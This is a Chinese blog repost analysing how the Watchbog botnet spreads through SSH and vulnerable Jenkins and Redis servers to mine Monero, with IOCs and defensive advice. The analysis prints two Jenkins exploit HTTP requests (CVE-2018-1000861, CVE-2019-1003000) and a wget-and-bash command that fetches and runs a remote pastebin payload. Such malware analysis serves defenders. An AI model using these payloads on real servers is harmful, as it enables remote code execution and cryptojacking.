对 Watchbog Botnet 渗透过程和 Payload 的分析

最新推荐文章于 2024-10-07 18:38:39 发布
最新推荐文章于 2024-10-07 18:38:39 发布
阅读量217 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 运维 shell 数据库
原文链接:http://www.cnblogs.com/17bdw/p/11515944.html
Watchbog僵尸网络利用CVE-2018-1000861和CVE-2019-1003000等漏洞进行横向移动,挖掘Monero加密货币。通过SSH、Jenkins和Redis服务器传播,使用恶意Python脚本和cron作业实现持久性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞利用

  • CVE-2018-1000861 https://jenkins.io/security/advisory/2018-12-05/

Watchbog在做什么?

Watchbog僵尸网络为其所有者挖掘Monero加密货币

通过SSH进行横向移动

使用SSH进行横向扩散。使用网络日志可以看到大量的SSH流量

以下Bash脚本用于促进横向移动过程。检索受感染系统上的known_hosts文件的内容,然后尝试SSH到这些系统。还检查SSH密钥是否存在,并利用它们对known_hosts文件中的系统进行身份验证。如果成功则启动感染模块。

549050-20190913022055891-1570974903.png

通过JENKINS和REDIS服务器进行横向移动

除了利用SSH进行横向移动之外,Watchbog还尝试利用Python脚本扫描主机子网上的开放Jenkins和Redis端口。如果脚本发现任何易受攻击的服务器,会尝试使用curl或wget命令从Pastebin检索有效的Payload并在目标上执行。

根据第71行的以下字符串,该脚本以CVE-2018-1000861为目标,这是Staple Web框架中的漏洞,适用于处理HTTP请求的Jenkins 2.138.1或2.145版本。

549050-20190913022302487-391211494.png

持久性机制

使用cron,dropper每小时调用Pastebins以获取新信息。下面的截图显示了Watchbog配置负责实现受感染系统持久性的cron作业的方式。

549050-20190913022438752-2085468774.png

受害者机器上的Payload

CVE-2018-1000861 :

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=True&value=public class x{public x(){new String("776765742068747470733a2f2f706173746562696e2e636f6d2f7261772f42335235556e7768202d4f202f746d702f62616279".decodeHex()).execute()}} HTTP/1.1
Host: [victim_host]:[jenkins_port]

针对CVE-2019-1003000的攻击

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1
Host: [victim_host]:[jenkins_port]

CVE-2018-1000861是Jenkins的Stapler Web框架中的漏洞,而CVE-2019-1003000是Script Security Plugin中的漏洞。

前CVE-2018-1000861有效负载中的十六进制编码部分下载并运行恶意shell命令:

···
wget https://pastebin.com/raw/B3R5Unwh -O /tmp/baby
bash /tmp/baby
···
包含的url指向另一个pastebin url(https://pastebin.com/raw/J6NdVBHq),它指向另一个。

549050-20190913022742540-1882944607.png

549050-20190913022759023-1569738504.png

恶意shell脚本的主要部分已编码并放在https://pastebin.com/raw/KGwfArMR中。

挖掘和持久性

在执行上述shell脚本期间,通过从以下URL下载(从$ mi_64解码)在受害者服务器上安装加密货币挖掘器

https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz

549050-20190913022912147-1870120307.png

挖掘的配置文件如下:

549050-20190913022935582-234912179.png

恶意shell脚本通过将自身添加到crontab来维护持久性。

549050-20190913023010247-211414167.png

其他被篡改的crontab文件:

549050-20190913023100738-253166367.png

IOC

Hashes (SHA256):

b383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61 0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a

3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA

Domains:

aziplcr72qjhzvin[.]onion[.]to

安全建议

  • 内部使用服务不应暴露于互联网。使用适当的ACL或其他身份验证技术仅允许来自可信用户的访问。
  • 用户必须及时升级其软件,尤其是当软件供应商发布了与安全相关的建议时。

参考

  • https://www.alibabacloud.com/blog/return-of-watchbog-exploiting-jenkins-cve-2018-1000861_594798
  • https://blogs.jpcert.or.jp/ja/2018/06/wellmess.html

转载于:https://www.cnblogs.com/17bdw/p/11515944.html

Jenkins远程命令执行漏洞(CVE-2018-1000861)
玄道的网安博客
06-06 5727
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
Jenkins的CVE-2018-1000861学习
公众号shadow sock7
05-22 1939
参考: https://www.lucifaer.com/2019/03/04/Jenkins RCE分析CVE-2018-1000861分析)/ https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ // 这句将req中的字符串转换成Jenkins自己规范的路由 // 比如这里将/je...
jenkins 漏洞集合 简介
热门推荐
whatday的专栏
06-04 1万+
目录 CVE-2015-8103 反序列化远程代码执行 CVE-2016-0788 Jenkins CILTS 远程代码执行漏洞 CVE-2016-0792 低权限用户命令执行 CVE-2016-9299 代码执行 CVE-2017-1000353 Jenkins-CI 远程代码执行 CVE-2018-1000110 用户枚举 CVE-2018-1000861 远程命令执行 CVE-2018-1999002 任意文件读取 CVE-2018-1000600 Jenkins GitHub 信
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 636
Jenkins远程命令执行漏洞(CVE-2018-1000861) by ADummy 0x00利用路线 ​ 反序列化生成ser文件—>现有poc直接发送 0x01漏洞介绍 ​ 0x 02漏洞复现 步骤一、生成序列化字符串 参考https://github.com/vulhub/CVE-2017-1000353,首先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar,这是生成POC的工具。 执行下面命令,生成字节码文件: java -jar CVE-2017-10003
CVE-2019-1003000:[Jenkins]Script Security Plugin沙箱绕过
公众号shadow sock7
05-09 1170
先访问 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile 不带value, 跟进 workflow-cps.jar!\org\jenkinsci\plugins\workflow\cps\CpsFlowDefinition$DescriptorImpl#doCheckScriptCompile(@QueryParameter S
Dirtz Net: 探测分析botnet扫描技术
botnet scanner是一种专门用于检测分析botnets的工具,它能帮助安全研究人员网络管理员了解网络中是否存在botnet活动,并确定可能被感染的设备。Dirtz_Net_botnet_扫描器的使用能够对那些可能成为botnet一部分的...
网络恶意程序“Botnet”的检测技术的分析
07-04
目前Botnet技术发展最为快速,不论是对网络安全运行还是用户数据安全的保护来说,Botnet都是极具威胁的隐患。介绍了Botnet技术的同时也对Botnet检测技术进行了研究,对几种主要的Botnet检测技术进行了深入分析
DripSource_botnet_
10-04
【描述】"botnet scanner scanningggg" 描述了这个过程是针对botnet的扫描操作,可能是安全研究人员或自动化系统在检测识别潜在的僵尸网络节点。扫描可能涉及网络探测,寻找暴露的漏洞,或者追踪已知botnet相关的...
系统内核级botnet分析防范
01-27
在网络安全领域,僵尸网络(botnet)是一个重大威胁。僵尸网络是由大量被恶意软件感染的计算机组成的网络,这些计算机通常...随着僵尸网络技术的不断进步,我们需要不断更新我们的分析防护策略,以适应新的安全挑战。
Mirai_ResearchAnalytics_botnet_
10-01
标题中的“Mirai_ResearchAnalytics_botnet_”暗示了我们将对这个著名的恶意软件进行深入研究分析,以揭示其工作原理、影响以及如何防范。 Mirai 是一种针对物联网设备的恶意软件,首次出现于2016年,它的主要...
Jenkins远程命令执行漏洞(CVE-2018-1000861
qq_62056583的博客
07-10 871
通过更新中心中的1000 多个插件,Jenkins 集成了持续集成持续交付工具链中几乎所有的工具。Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。它可以独立运行多种进程、多个应用,更加充分地发挥基础设施的作用,同时保持各个独立系统的安全性。使用docker exec -it ID bin/bash进入目录中进行查看,可以看到成功注入,漏洞复现成功。使用docker技术搭建漏洞环境,在实验环境中复现该漏洞。IP地址:192.168.32.135。
[漏洞复现] jenkins 远程代码执行 (CVE-2019-100300)
qq_45751902的博客
11-24 3051
拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码一个存在的job。Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。
小白也可以看懂的漏洞分析(CVE-2018-12613)
西西弗斯的巨石
05-20 5000
漏洞编号CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。本篇文章主要侧重于对该漏洞的原理进行分析,并给出利用该漏洞的方法。并介绍了理解该漏洞的背景知识。
jenkins rec 分析 cve-2018-1000861 分析
whatday的专栏
06-02 1218
0x01 Jenkins的动态路由解析 web.xml: 可以看到Jenkins将所有的请求交给org.kohsuke.stapler.Stapler来处理的,跟进看一下这个类中的service方法: 可以看到这里会根据url来调用不同的webApp,如果url以/$stapler/bound/开头,则根节点对象为org.kohsuke.stapler.bind.BoundObjectTable,否则为hudson.model.Hudson(继承jenkins.model.Jenkins)
威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板” ...
weixin_34353714的博客
03-26 301
简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件。除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患。 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误...
深度解析内网横向移动及防御策略
最新发布
waitaikong_的博客
10-07 2786
本文旨在深入探讨横向移动攻击的各个阶段、攻击手段及其防御策略,为企业提供一套全面且深入的防御体系构建指南,以应对日益复杂的内网安全威胁。信息收集作为横向移动攻击的起始步骤,对于攻击者来说至关重要。横向移动攻击是指攻击者在成功入侵内网的某一系统后,不直接进行破坏性行为,而是通过进一步的信息收集、凭证窃取、漏洞利用等手段,逐步渗透并控制更多主机资源的过程。被动信息收集,顾名思义,是指攻击者在不主动与网络进行直接交互的前提下,通过分析现有的系统数据、文件、日志等信息资源,来间接获取内网的关键情报。
浏览器打开SSH,横向扩展到各个快捷方式
qq_13633927的博客
12-15 498
最近使用一款网络监控平台,其中有一个登录按钮,每次登录都是新开一个网页,URL是 ssh://设备IP 百度了一些方案,最后试验成功。 Prerequisites: 已安装putty 具有管理员权限 原理: 修改注册表SSH调用的一个路径,在该路径下添加一个调用putty的批处理。 1.修改注册表,使用reg文件合并方式。 REGEDIT4 [HKEY_CLASSES_ROOT\ssh] @="URL:ssh Protocol" "URL Protocol"="" [HKEY_CL
内网安全之横向移动入门实验
ailx10
06-01 276
说起横向移动,比较偏向渗透测试实战,自然让人想到了SMB横向扩散,SSH横向扩散,RDP横向扩散,在企业安全中,这几个事件经常碰到,并且大多数情况下,都能判定主机中毒了。做为补充的一个安全事件是端口扫描,这样可以构成攻击链条,也就是安全分析运维人员中的杀伤链,在2020年的某个CERT实验局点中,凭借对横向移动端口扫描事件的研判,提交失陷主机,取得了友商第二的好成绩。在后来的ATT&CK...
上网查资料无意间搜到国家级黑客组织,于是就了解了一下 原创
HBohan的博客
08-21 1302
The Dukes归因 The Dukes系列是APT29最早的组织代号,早期的Dukes特马工具是在2013年由卡巴斯基安全团队作为未知类型攻击组件进行命名披露的。对于The Dukes系列的归因,我们重点探讨如何将The Dukes归因至俄罗斯政府背景黑客组织,而对于如何将APT29关联到俄罗斯联邦对外情报局(SVR)不在本文讨论范围内。 WellMess归因 WellMess系列木马在2018年由JPCERT作为一款独立的新型木马披露。2020年,在对英美在内的全球COVID-19疫苗研制机构的网络间
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值